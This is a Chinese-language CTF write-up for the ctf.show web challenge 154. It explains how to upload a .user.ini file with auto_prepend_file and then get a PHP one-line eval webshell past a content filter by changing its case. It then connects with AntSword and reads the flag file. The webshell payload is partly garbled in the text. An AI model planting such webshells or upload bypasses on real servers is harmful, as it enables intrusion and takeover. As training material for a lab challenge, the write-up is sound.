ctf show web入门154

这道题考查的还是文件上传漏洞,但是本题提示后端不能单二校验,说明本题的后端检验更加严格

我们前面的操作跟上一题一样,先上传一个.user.ini文件文件内容是:auto_prepend_file=一句话木马文件名

将文件名改为.user.ini.png是为了绕过前端验证用bp抓包后需要把文件名改回为.user.ini防止因修改后缀名导致错误

上传成功后将包含一句话木马的文件也上传到该网站

此时发现上传失败

考虑到提示说后端不能单二校验所以该题肯定还有其他限制条件,我们考虑是否为
<?php @eval(_POST\['attack'\]);?\>的文件头没有图片文件的特点,所以我们尝试在 \_POST'attack');?>前加上Gif89a

所以不是文件头检验,还有可能是检验Content-Type: image/png但是前端允许.png文件上传所以这里不考虑

,那就可能是文件内容检验我们尝试修改一句话木马将: <?php @eval(_POST\['attack'\]);?\>改为 \_POST'attack');?>使用大写来绕过限制

发现上传成功现在我们可以尝试使用蚁剑连接

url地址为http://e88615b4-0b6c-4c55-8944-635c13ab6c4e.challenge.ctf.show/upload/

发现成功连接上蚁剑,接下来就是查看当前网站下的目录

最后在文件路径为/var/www/html/flag.php下找到了flag

相关推荐
智者知已应修善业5 小时前
【4060BD_5V应用电路图】2022-12-24
驱动开发·经验分享·笔记·硬件架构·硬件工程
小李不想当小白8 小时前
DMA直接存储器存取(STM32标准库学习笔记)
笔记·stm32·单片机·嵌入式硬件·学习·分享
2601_9653842610 小时前
口腔黏膜清洁的工程化路径:从表面形貌表征到清洁策略匹配
经验分享·笔记
泡泡鱼(敲代码中)10 小时前
Python 容器类型学习笔记:列表、元组、字典、集合
开发语言·笔记·python·pycharm
Hotchip_MEMS12 小时前
传统咪头与MEMS硅麦:雾化器气流传感方案对比
人工智能·笔记·物联网·电脑·制造
志尊宝12 小时前
Vue3 零基础每日笔记(040):Vite 创建 Vue3 + TS 项目——企业标配从这一篇开始
笔记·vue·html·前端开发·软件开发
水云桐程序员12 小时前
量子力学概论,量子力学概念总结
笔记·科技·学习·量子计算
darin_ฅ( ̳• ◡ • ̳)ฅ112 小时前
【 Obsidian】2026版-Obsidian安装Automatic Table of Contents 插件一键生成文章目录
笔记
2401_8501220413 小时前
航空、轨交、汽车线束防护有什么不同?三大行业的共性、差异与选型逻辑
经验分享·笔记·科技
志尊宝13 小时前
Vue3 零基础每日笔记(037):动手封装 useMouse 与 useWindowSize——事件监听的标准模板
前端·javascript·vue.js·笔记·html5